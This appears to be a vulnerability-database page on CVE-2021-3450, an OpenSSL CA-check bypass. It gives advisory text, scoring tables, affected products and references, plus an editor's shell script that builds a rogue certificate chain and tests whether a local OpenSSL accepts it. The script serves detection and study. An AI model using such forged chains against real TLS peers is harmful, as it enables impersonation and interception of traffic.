CVE-2021-3450 | CA certificate check bypass with X509_V_FLAG_X509_STRICT

The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates.

If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application.

In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose.

OpenSSL versions 1.1.1h through 1.1.1j are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).
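The following script is an added example by the editor of this page; it is not code from the advisory, from OpenSSL, or from any vendor listed below. It recreates the exact preconditions the advisory describes: a trusted CA, a non-CA leaf certificate issued by it, and a "rogue" end-entity certificate signed with the leaf's key. It then runs `openssl verify` three ways (default flags, `-x509_strict` with no purpose, `-x509_strict -purpose sslserver`) so the bypass, and the purpose-based safety net, can be observed on whatever build is installed. It assumes an `openssl` binary (1.1.1 or 3.x) with its default openssl.cnf; all certificates, names (Example-CA, leaf.example, rogue.example) and helper functions are constructed here. One detail matters for reproducing the bug: the leaf deliberately carries no keyUsage extension, because OpenSSL's issuer matching (`X509_check_issued`) refuses an issuer whose keyUsage lacks keyCertSign before any CA check runs, so a leaf with `keyUsage=digitalSignature` could not be abused this way.

```shell
#!/bin/sh
# Editor's added example, not code from the advisory or from OpenSSL.
# Reproduces the CVE-2021-3450 preconditions with the openssl CLI and reports
# how the installed build behaves. Assumes an `openssl` binary (1.1.1 or 3.x)
# with its default openssl.cnf; every certificate below is constructed here.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# P-256 key encoded as a *named* curve. In 1.1.1h-j the strict-mode check for
# explicitly encoded curve parameters passed for such keys, and its result
# overwrote the earlier "this issuer is not a CA" verdict.
gen_key() {
    openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:P-256 \
        -pkeyopt ec_param_enc:named_curve -out "$1" 2>/dev/null
}

# issue NAME CN [SIGNER]: build $NAME.pem from a fresh CSR using $NAME.ext;
# signed by $SIGNER.pem/$SIGNER.key, or self-signed when SIGNER is omitted.
issue() {
    name=$1 cn=$2 signer=${3:-}
    openssl req -new -key "$WORK/$name.key" -subj "/CN=$cn" \
        -out "$WORK/$name.csr" 2>/dev/null
    if [ -z "$signer" ]; then
        openssl x509 -req -in "$WORK/$name.csr" -signkey "$WORK/$name.key" \
            -days 7 -extfile "$WORK/$name.ext" -out "$WORK/$name.pem" 2>/dev/null
    else
        openssl x509 -req -in "$WORK/$name.csr" -CA "$WORK/$signer.pem" \
            -CAkey "$WORK/$signer.key" -CAcreateserial -days 7 \
            -extfile "$WORK/$name.ext" -out "$WORK/$name.pem" 2>/dev/null
    fi
}

# Constructed chain: ca (CA:TRUE) -> leaf (CA:FALSE) -> rogue, where rogue is
# signed with the non-CA leaf's key. The leaf deliberately has no keyUsage:
# OpenSSL's issuer matching (X509_check_issued) refuses an issuer whose
# keyUsage lacks keyCertSign before any CA check runs, so only a non-CA cert
# with no keyUsage (or one that includes keyCertSign) can be abused this way.
build_chain() {
    gen_key "$WORK/ca.key"; gen_key "$WORK/leaf.key"; gen_key "$WORK/rogue.key"
    printf '%s\n' 'basicConstraints=critical,CA:TRUE' \
        'keyUsage=critical,keyCertSign,cRLSign' \
        'subjectKeyIdentifier=hash' > "$WORK/ca.ext"
    printf '%s\n' 'basicConstraints=critical,CA:FALSE' \
        'extendedKeyUsage=serverAuth' 'subjectKeyIdentifier=hash' \
        'authorityKeyIdentifier=keyid' \
        'subjectAltName=DNS:leaf.example' > "$WORK/leaf.ext"
    sed 's/leaf\.example/rogue.example/' "$WORK/leaf.ext" > "$WORK/rogue.ext"
    issue ca Example-CA
    issue leaf leaf.example ca
    issue rogue rogue.example leaf
}

# Prints "accepted" or "rejected" for the rogue chain under the given flags.
verify_rogue() {
    if openssl verify -CAfile "$WORK/ca.pem" -untrusted "$WORK/leaf.pem" "$@" \
        "$WORK/rogue.pem" >/dev/null 2>&1; then echo accepted; else echo rejected; fi
}

# Control: the legitimate leaf must pass with strict checking and a purpose.
verify_leaf() {
    if openssl verify -CAfile "$WORK/ca.pem" -x509_strict -purpose sslserver \
        "$WORK/leaf.pem" >/dev/null 2>&1; then echo accepted; else echo rejected; fi
}

# The CVE condition: X509_STRICT set and no purpose. A fixed build rejects.
cve_2021_3450_status() {
    case $(verify_rogue -x509_strict) in
        accepted) echo VULNERABLE ;;
        *)        echo not-vulnerable ;;
    esac
}

# Static triage of an `openssl version` string, e.g. "OpenSSL 1.1.1i  8 Dec 2020".
# Distro builds backport fixes without changing this string, so "affected"
# here means "run the behavioural check above", not "confirmed vulnerable".
version_affected() {
    set -- $1
    case ${2:-} in
        1.1.1h|1.1.1i|1.1.1j) echo affected ;;
        *) echo unaffected ;;
    esac
}

build_chain
echo "control, leaf with strict + purpose:  $(verify_leaf)"
echo "rogue, default flags:                 $(verify_rogue)"
echo "rogue, strict, no purpose:            $(verify_rogue -x509_strict)"
echo "rogue, strict + purpose sslserver:    $(verify_rogue -x509_strict -purpose sslserver)"
echo "$(openssl version): $(cve_2021_3450_status)"
```

On a fixed build all three rogue verifications are rejected and the leaf control is accepted; on 1.1.1h through 1.1.1j the "strict, no purpose" line is the only one that reports accepted, which is the bypass. The same split applies in application code: an X509_VERIFY_PARAM that has X509_V_FLAG_X509_STRICT set via X509_VERIFY_PARAM_set_flags() but no purpose set via X509_VERIFY_PARAM_set_purpose() (for example X509_PURPOSE_SSL_SERVER or X509_PURPOSE_SSL_CLIENT) is the configuration to look for; restoring the purpose closes the hole even before the library is upgraded.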

Published: 2021-03-25 Last update: 2024-11-21 Assigner: [email protected] Source: [email protected]

Conclusion & alert: CVE-2021-3450 is rated Moderate Risk (52.7/100): CVSS High severity, with medium exploitation likelihood (EPSS 0.50%). Mandatory action: Review affected assets and schedule remediation. Triage note: exposure requires an application that sets X509_V_FLAG_X509_STRICT and verifies either without a purpose or with libssl's default purpose overridden; default libssl TLS client and server verification, which sets a purpose, rejects the malformed chain even on 1.1.1h-1.1.1j.

Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.

Exploit prediction scoring system (EPSS) score for CVE-2021-3450

EPSS lead: EPSS is a daily estimate of the probability that a CVE will be exploited in the wild within the next 30 days; the percentile places this CVE among all scored vulnerabilities (a higher percentile means a larger share of scored CVEs have a lower probability).

#  Date        Old EPSS score  New EPSS score  Delta (New - Old)
1  2026-03-16  0.42%           0.50%           +0.09%
2  2026-02-18  0.50%           0.42%           -0.09%
3  2026-01-05  -               0.50%           -

Full EPSS history (44 records total)

Common vulnerability scoring system (CVSS) metrics for CVE-2021-3450

Base score  Version  Severity  Vector                                        Exploitability  Impact  Score source
7.4         3.1      HIGH      CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N  2.2             5.2     [email protected]
5.8         2.0      MEDIUM    AV:N/AC:M/Au:N/C:P/I:P/A:N                    8.6             4.9     [email protected]

CVSS 3.1 vector, metric by metric:
Attack vector (AV:N): exploitable over the network; the attacker presents a crafted certificate chain to a verifying peer and needs no local access.
Attack complexity (AC:H): success depends on conditions the attacker does not control, here a victim application that enables X509_V_FLAG_X509_STRICT and verifies without a purpose.
Privileges required (PR:N): no account or credentials are needed.
User interaction (UI:N): no action by a user is required.
Scope (S:U): the impact stays within the security authority of the vulnerable component.
Confidentiality (C:H): a chain that wrongly passes verification lets the holder of any non-CA certificate impersonate a peer, so traffic meant for that peer can be read.
Integrity (I:H): the same impersonation lets that traffic be modified.
Availability (A:N): no availability impact.

CVSS 2.0 vector, metric by metric:
Access vector (AV:N): exploitable over the network.
Access complexity (AC:M): exploitation needs some favorable conditions, but not exceptional ones.
Authentication (Au:N): no authentication is required.
Confidentiality impact (C:P): partial confidentiality impact.
Integrity impact (I:P): partial integrity impact.
Availability impact (A:N): no availability impact.

Weakness enumeration for CVE-2021-3450

GitHub Security Advisory for CVE-2021-3450

GHSA-8hfj-xrj2-pm22 · Severity: high · Ecosystem: rust — Certificate check bypass in openssl-src

OS Trackers for CVE-2021-3450

Vendor  Priority  Summary  Link
alpine  high  3 source package rows (openssl, openssl1.1-compat, openssl3); 25 state rows across 13 repos (3.10-main, 3.11-main, 3.12-main, 3.17-community, 3.17-main, 3.18-community, 3.18-main, 3.19-main, 3.20-main, 3.21-main, 3.22-main, edge-community, edge-main); fixed 15, open 10.  https://security.alpinelinux.org/vuln/CVE-2021-3450
debian  not yet assigned  1 source package (openssl); 5 status rows across 5 suites (bookworm, bullseye, forky, sid, trixie): resolved 5.  https://security-tracker.debian.org/tracker/CVE-2021-3450
gentoo  normal  1 GLSA (202103-03), 1 atom (dev-libs/openssl); latest impact normal.  https://bugs.gentoo.org/buglist.cgi?quicksearch=CVE-2021-3450
redhat  high  -  https://access.redhat.com/security/cve/CVE-2021-3450
suse  high (SUSE severity: important)  92 source package names (12:nodejs12-12.22.2-4.16.1, 12:npm12-12.22.2-4.16.1, …); 586 product×package rows across 84 product lines (Container bci/node, HPE Helion OpenStack 8, …): Known Not Affected 414, Fixed 172.  https://www.suse.com/security/cve/CVE-2021-3450/
ubuntu  high  4 source packages (edk2, nodejs, openssl, openssl1.0); 24 status rows across 6 suites (bionic, focal, groovy, trusty, upstream, xenial): not-affected 16, DNE 5, needs-triage 3.  https://ubuntu.com/security/CVE-2021-3450

Affected software / configurations for CVE-2021-3450

Vendor Product Version Raw CPE
openssl openssl >= 1.1.1h, < 1.1.1k cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:-:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:p1:*:*:*:*:*:*
freebsd freebsd 12.2 cpe:2.3:o:freebsd:freebsd:12.2:p2:*:*:*:*:*:*
netapp santricity_smi-s_provider_firmware cpe:2.3:o:netapp:santricity_smi-s_provider_firmware:-:*:*:*:*:*:*:*
netapp storagegrid_firmware cpe:2.3:o:netapp:storagegrid_firmware:-:*:*:*:*:*:*:*
windriver linux cpe:2.3:o:windriver:linux:-:*:*:*:cd:*:*:*
windriver linux 17.0 cpe:2.3:o:windriver:linux:17.0:*:*:*:lts:*:*:*
windriver linux 18.0 cpe:2.3:o:windriver:linux:18.0:*:*:*:lts:*:*:*
windriver linux 19.0 cpe:2.3:o:windriver:linux:19.0:*:*:*:lts:*:*:*
netapp cloud_volumes_ontap_mediator cpe:2.3:a:netapp:cloud_volumes_ontap_mediator:-:*:*:*:*:*:*:*
netapp oncommand_workflow_automation cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*
netapp ontap_select_deploy_administration_utility cpe:2.3:a:netapp:ontap_select_deploy_administration_utility:-:*:*:*:*:*:*:*
netapp storagegrid cpe:2.3:a:netapp:storagegrid:-:*:*:*:*:*:*:*
fedoraproject fedora 34 cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
tenable nessus <= 8.13.1 cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*
tenable nessus_agent >= 8.2.1, <= 8.2.3 cpe:2.3:a:tenable:nessus_agent:*:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.11.0 cpe:2.3:a:tenable:nessus_network_monitor:5.11.0:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.11.1 cpe:2.3:a:tenable:nessus_network_monitor:5.11.1:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.12.0 cpe:2.3:a:tenable:nessus_network_monitor:5.12.0:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.12.1 cpe:2.3:a:tenable:nessus_network_monitor:5.12.1:*:*:*:*:*:*:*
tenable nessus_network_monitor 5.13.0 cpe:2.3:a:tenable:nessus_network_monitor:5.13.0:*:*:*:*:*:*:*
oracle commerce_guided_search 11.3.2 cpe:2.3:a:oracle:commerce_guided_search:11.3.2:*:*:*:*:*:*:*
oracle enterprise_manager_for_storage_management 13.4.0.0 cpe:2.3:a:oracle:enterprise_manager_for_storage_management:13.4.0.0:*:*:*:*:*:*:*
oracle graalvm 19.3.5 cpe:2.3:a:oracle:graalvm:19.3.5:*:*:*:enterprise:*:*:*
oracle graalvm 20.3.1.2 cpe:2.3:a:oracle:graalvm:20.3.1.2:*:*:*:enterprise:*:*:*
oracle graalvm 21.0.0.2 cpe:2.3:a:oracle:graalvm:21.0.0.2:*:*:*:enterprise:*:*:*
oracle jd_edwards_enterpriseone_tools < 9.2.6.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
oracle jd_edwards_world_security a9.4 cpe:2.3:a:oracle:jd_edwards_world_security:a9.4:*:*:*:*:*:*:*
oracle mysql_connectors <= 8.0.23 cpe:2.3:a:oracle:mysql_connectors:*:*:*:*:*:*:*:*
oracle mysql_enterprise_monitor <= 8.0.23 cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*
oracle mysql_server <= 5.7.33 cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*
oracle mysql_server >= 8.0.15, <= 8.0.23 cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*
oracle mysql_workbench <= 8.0.23 cpe:2.3:a:oracle:mysql_workbench:*:*:*:*:*:*:*:*
oracle peoplesoft_enterprise_peopletools >= 8.57, <= 8.59 cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
oracle secure_backup < 18.1.0.1.0 cpe:2.3:a:oracle:secure_backup:*:*:*:*:*:*:*:*
oracle secure_global_desktop 5.6 cpe:2.3:a:oracle:secure_global_desktop:5.6:*:*:*:*:*:*:*
oracle weblogic_server 12.2.1.4.0 cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
oracle weblogic_server 14.1.1.0.0 cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
mcafee web_gateway 8.2.19 cpe:2.3:a:mcafee:web_gateway:8.2.19:*:*:*:*:*:*:*
mcafee web_gateway 9.2.10 cpe:2.3:a:mcafee:web_gateway:9.2.10:*:*:*:*:*:*:*
mcafee web_gateway 10.1.1 cpe:2.3:a:mcafee:web_gateway:10.1.1:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 8.2.19 cpe:2.3:a:mcafee:web_gateway_cloud_service:8.2.19:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 9.2.10 cpe:2.3:a:mcafee:web_gateway_cloud_service:9.2.10:*:*:*:*:*:*:*
mcafee web_gateway_cloud_service 10.1.1 cpe:2.3:a:mcafee:web_gateway_cloud_service:10.1.1:*:*:*:*:*:*:*
sonicwall sma100_firmware < 10.2.1.0-17sv cpe:2.3:o:sonicwall:sma100_firmware:*:*:*:*:*:*:*:*
sonicwall capture_client < 3.6.24 cpe:2.3:a:sonicwall:capture_client:*:*:*:*:*:*:*:*
sonicwall email_security < 10.0.11 cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*
sonicwall sonicos <= 7.0.1-r1456 cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*
nodejs node.js >= 10.0.0, < 10.24.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 12.0.0, < 12.22.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 14.0.0, < 14.16.1 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*
nodejs node.js >= 15.0.0, < 15.14.0 cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*

References for CVE-2021-3450

URL Tags
http://www.openwall.com/lists/oss-security/2021/03/27/1 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/27/2 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/28/3 Mailing List Third Party Advisory
http://www.openwall.com/lists/oss-security/2021/03/28/4 Mailing List Third Party Advisory
https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf Third Party Advisory
https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845 Third Party Advisory
https://kc.mcafee.com/corporate/index?page=content&id=SB10356 Third Party Advisory
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/
https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html Mailing List Vendor Advisory
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013 Third Party Advisory
https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc Third Party Advisory
https://security.gentoo.org/glsa/202103-03 Third Party Advisory
https://security.netapp.com/advisory/ntap-20210326-0006/ Third Party Advisory
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd Third Party Advisory
https://www.openssl.org/news/secadv/20210325.txt Vendor Advisory
https://www.oracle.com//security-alerts/cpujul2021.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuApr2021.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuapr2022.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpujul2022.html Patch Third Party Advisory
https://www.oracle.com/security-alerts/cpuoct2021.html Patch Third Party Advisory
https://www.tenable.com/security/tns-2021-05 Third Party Advisory
https://www.tenable.com/security/tns-2021-08 Third Party Advisory
https://www.tenable.com/security/tns-2021-09 Third Party Advisory